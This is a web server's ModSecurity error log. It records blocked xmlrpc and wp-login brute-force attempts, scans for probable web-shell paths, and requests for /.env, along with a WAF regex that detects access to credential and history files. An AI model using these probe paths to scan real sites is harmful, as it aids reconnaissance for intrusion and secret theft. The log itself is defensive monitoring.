[Tue May 26 19:28:12.846832 2026] [security2:error] [pid 49598:tid 49625] [remote 72.167.150.128:58596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWm9OzJzkdc0WtdrwtccQAAnBo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:28:12.930307 2026] [security2:error] [pid 49598:tid 49853] [client 176.65.139.232:34870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "unsobered.moes-art.com"] [uri "/.env"] [unique_id "ahWm9OzJzkdc0WtdrwtcdAAAAQI"]
[Tue May 26 19:28:13.186719 2026] [autoindex:error] [pid 49598:tid 49837] [client 95.111.235.131:61989] AH01276: Cannot serve directory /home2/aarindhr/public_html/canopykaapi.com/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 19:28:13.274922 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:56659] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9ezJzkdc0WtdrwtciAAAAK4"]
[Tue May 26 19:28:13.275019 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:56659] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9ezJzkdc0WtdrwtciAAAAK4"]
[Tue May 26 19:28:14.073923 2026] [security2:error] [pid 49598:tid 49743] [client 91.245.236.124:9833] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9uzJzkdc0WtdrwtcoAAAAJQ"]
[Tue May 26 19:28:14.074049 2026] [security2:error] [pid 49598:tid 49743] [client 91.245.236.124:9833] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9uzJzkdc0WtdrwtcoAAAAJQ"]
[Tue May 26 19:28:14.362319 2026] [security2:error] [pid 49598:tid 49831] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm9ezJzkdc0WtdrwtcmAAAAOw"]
[Tue May 26 19:28:14.821947 2026] [security2:error] [pid 49598:tid 49729] [client 20.63.34.22:12160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWm9uzJzkdc0WtdrwtcuwAAAIY"]
[Tue May 26 19:28:14.822143 2026] [security2:error] [pid 49598:tid 49729] [client 20.63.34.22:12160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWm9uzJzkdc0WtdrwtcuwAAAIY"]
[Tue May 26 19:28:14.865452 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:37209] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9uzJzkdc0WtdrwtcwgAAAIo"]
[Tue May 26 19:28:14.865563 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:37209] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9uzJzkdc0WtdrwtcwgAAAIo"]
[Tue May 26 19:28:15.153483 2026] [security2:error] [pid 49598:tid 49736] [client 20.63.34.22:12167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahWm9-zJzkdc0WtdrwtcygAAAI0"]
[Tue May 26 19:28:15.153588 2026] [security2:error] [pid 49598:tid 49736] [client 20.63.34.22:12167] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahWm9-zJzkdc0WtdrwtcygAAAI0"]
[Tue May 26 19:28:15.646761 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:53019] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9-zJzkdc0Wtdrwtc1wAAAOU"]
[Tue May 26 19:28:15.646889 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:53019] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9-zJzkdc0Wtdrwtc1wAAAOU"]
[Tue May 26 19:28:15.938497 2026] [security2:error] [pid 49598:tid 49776] [client 20.63.34.22:12169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWm9-zJzkdc0Wtdrwtc5wAAALU"]
[Tue May 26 19:28:15.938674 2026] [security2:error] [pid 49598:tid 49776] [client 20.63.34.22:12169] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWm9-zJzkdc0Wtdrwtc5wAAALU"]
[Tue May 26 19:28:16.038717 2026] [security2:error] [pid 49598:tid 49786] [client 176.65.139.235:31108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "drunktales.moes-art.com"] [uri "/.env"] [unique_id "ahWm-OzJzkdc0Wtdrwtc6wAAAL8"]
[Tue May 26 19:28:16.440043 2026] [security2:error] [pid 49598:tid 49837] [client 91.245.236.124:11793] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-OzJzkdc0Wtdrwtc-AAAAPI"]
[Tue May 26 19:28:16.440141 2026] [security2:error] [pid 49598:tid 49837] [client 91.245.236.124:11793] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-OzJzkdc0Wtdrwtc-AAAAPI"]
[Tue May 26 19:28:17.029203 2026] [security2:error] [pid 49598:tid 49752] [client 157.55.39.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWm-OzJzkdc0WtdrwtdBgAAAJ0"]
[Tue May 26 19:28:17.052875 2026] [security2:error] [pid 49598:tid 49778] [client 20.63.34.22:12282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdBwAAALc"]
[Tue May 26 19:28:17.052969 2026] [security2:error] [pid 49598:tid 49778] [client 20.63.34.22:12282] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdBwAAALc"]
[Tue May 26 19:28:17.223693 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:48367] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdCwAAAOQ"]
[Tue May 26 19:28:17.223789 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:48367] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdCwAAAOQ"]
[Tue May 26 19:28:17.752105 2026] [security2:error] [pid 49598:tid 49741] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdDgAAAJI"]
[Tue May 26 19:28:17.997593 2026] [security2:error] [pid 49598:tid 49853] [client 91.245.236.124:50021] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdLAAAAQI"]
[Tue May 26 19:28:17.997712 2026] [security2:error] [pid 49598:tid 49853] [client 91.245.236.124:50021] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdLAAAAQI"]
[Tue May 26 19:28:18.008369 2026] [security2:error] [pid 49598:tid 49657] [remote 88.198.165.116:53340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWm-ezJzkdc0WtdrwtdJQAAojo"]
[Tue May 26 19:28:18.527216 2026] [security2:error] [pid 49598:tid 49773] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm-uzJzkdc0WtdrwtdMgAAALI"]
[Tue May 26 19:28:18.576258 2026] [security2:error] [pid 49598:tid 49796] [client 20.63.34.22:12283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-block.php"] [unique_id "ahWm-uzJzkdc0WtdrwtdPwAAAMk"]
[Tue May 26 19:28:18.576360 2026] [security2:error] [pid 49598:tid 49796] [client 20.63.34.22:12283] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-block.php"] [unique_id "ahWm-uzJzkdc0WtdrwtdPwAAAMk"]
[Tue May 26 19:28:18.769558 2026] [security2:error] [pid 49598:tid 49797] [client 91.245.236.124:43721] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-uzJzkdc0WtdrwtdQwAAAMo"]
[Tue May 26 19:28:18.769701 2026] [security2:error] [pid 49598:tid 49797] [client 91.245.236.124:43721] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm-uzJzkdc0WtdrwtdQwAAAMo"]
[Tue May 26 19:28:19.175495 2026] [security2:error] [pid 49598:tid 49758] [client 20.63.34.22:12230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-der.php"] [unique_id "ahWm--zJzkdc0WtdrwtdTQAAAKM"]
[Tue May 26 19:28:19.175595 2026] [security2:error] [pid 49598:tid 49758] [client 20.63.34.22:12230] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-der.php"] [unique_id "ahWm--zJzkdc0WtdrwtdTQAAAKM"]
[Tue May 26 19:28:19.551864 2026] [security2:error] [pid 49598:tid 49831] [client 91.245.236.124:18253] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm--zJzkdc0WtdrwtdVwAAAOw"]
[Tue May 26 19:28:19.551962 2026] [security2:error] [pid 49598:tid 49831] [client 91.245.236.124:18253] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm--zJzkdc0WtdrwtdVwAAAOw"]
[Tue May 26 19:28:19.976599 2026] [security2:error] [pid 49598:tid 49794] [client 20.63.34.22:12287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ah25.php"] [unique_id "ahWm--zJzkdc0WtdrwtdZAAAAMc"]
[Tue May 26 19:28:19.976736 2026] [security2:error] [pid 49598:tid 49794] [client 20.63.34.22:12287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ah25.php"] [unique_id "ahWm--zJzkdc0WtdrwtdZAAAAMc"]
[Tue May 26 19:28:20.219042 2026] [security2:error] [pid 49598:tid 49731] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm--zJzkdc0WtdrwtdWgAAAIg"]
[Tue May 26 19:28:20.786358 2026] [security2:error] [pid 49598:tid 49729] [client 91.245.236.124:54517] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_OzJzkdc0WtdrwtdbgAAAIY"]
[Tue May 26 19:28:20.786568 2026] [security2:error] [pid 49598:tid 49729] [client 91.245.236.124:54517] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_OzJzkdc0WtdrwtdbgAAAIY"]
[Tue May 26 19:28:21.040987 2026] [security2:error] [pid 49598:tid 49745] [client 20.63.34.22:12182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWm_ezJzkdc0WtdrwtdhQAAAJY"]
[Tue May 26 19:28:21.041124 2026] [security2:error] [pid 49598:tid 49745] [client 20.63.34.22:12182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahWm_ezJzkdc0WtdrwtdhQAAAJY"]
[Tue May 26 19:28:21.551043 2026] [security2:error] [pid 49598:tid 49758] [client 91.245.236.124:49559] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_ezJzkdc0WtdrwtdkgAAAKM"]
[Tue May 26 19:28:21.551168 2026] [security2:error] [pid 49598:tid 49758] [client 91.245.236.124:49559] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_ezJzkdc0WtdrwtdkgAAAKM"]
[Tue May 26 19:28:22.322187 2026] [security2:error] [pid 49598:tid 49827] [client 91.245.236.124:59753] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdrQAAAOg"]
[Tue May 26 19:28:22.322309 2026] [security2:error] [pid 49598:tid 49827] [client 91.245.236.124:59753] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdrQAAAOg"]
[Tue May 26 19:28:22.381531 2026] [security2:error] [pid 49598:tid 49737] [client 20.63.34.22:12271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdrgAAAI4"]
[Tue May 26 19:28:22.381650 2026] [security2:error] [pid 49598:tid 49737] [client 20.63.34.22:12271] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdrgAAAI4"]
[Tue May 26 19:28:22.892892 2026] [security2:error] [pid 49598:tid 49788] [client 20.63.34.22:12173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdwwAAAME"]
[Tue May 26 19:28:22.893032 2026] [security2:error] [pid 49598:tid 49788] [client 20.63.34.22:12173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/file.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdwwAAAME"]
[Tue May 26 19:28:23.091293 2026] [security2:error] [pid 49598:tid 49809] [client 91.245.236.124:24437] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_-zJzkdc0WtdrwtdygAAANY"]
[Tue May 26 19:28:23.091435 2026] [security2:error] [pid 49598:tid 49809] [client 91.245.236.124:24437] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_-zJzkdc0WtdrwtdygAAANY"]
[Tue May 26 19:28:23.140599 2026] [security2:error] [pid 49598:tid 49824] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdvgAAAOU"]
[Tue May 26 19:28:23.858571 2026] [security2:error] [pid 49598:tid 49846] [client 91.245.236.124:50397] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_-zJzkdc0Wtdrwtd4wAAAPs"]
[Tue May 26 19:28:23.858715 2026] [security2:error] [pid 49598:tid 49846] [client 91.245.236.124:50397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm_-zJzkdc0Wtdrwtd4wAAAPs"]
[Tue May 26 19:28:23.931247 2026] [security2:error] [pid 49598:tid 49732] [client 20.63.34.22:12251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/favicon.php"] [unique_id "ahWm_-zJzkdc0Wtdrwtd5gAAAIk"]
[Tue May 26 19:28:23.931383 2026] [security2:error] [pid 49598:tid 49732] [client 20.63.34.22:12251] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/favicon.php"] [unique_id "ahWm_-zJzkdc0Wtdrwtd5gAAAIk"]
[Tue May 26 19:28:24.252130 2026] [security2:error] [pid 49598:tid 49730] [client 45.132.227.223:22083] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWm_uzJzkdc0WtdrwtdwgAAAIc"]
[Tue May 26 19:28:24.677058 2026] [security2:error] [pid 49598:tid 49770] [client 91.245.236.124:51089] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnAOzJzkdc0Wtdrwtd-AAAAK8"]
[Tue May 26 19:28:24.677191 2026] [security2:error] [pid 49598:tid 49770] [client 91.245.236.124:51089] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnAOzJzkdc0Wtdrwtd-AAAAK8"]
[Tue May 26 19:28:25.471349 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:14255] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnAezJzkdc0WtdrwteDAAAAPo"]
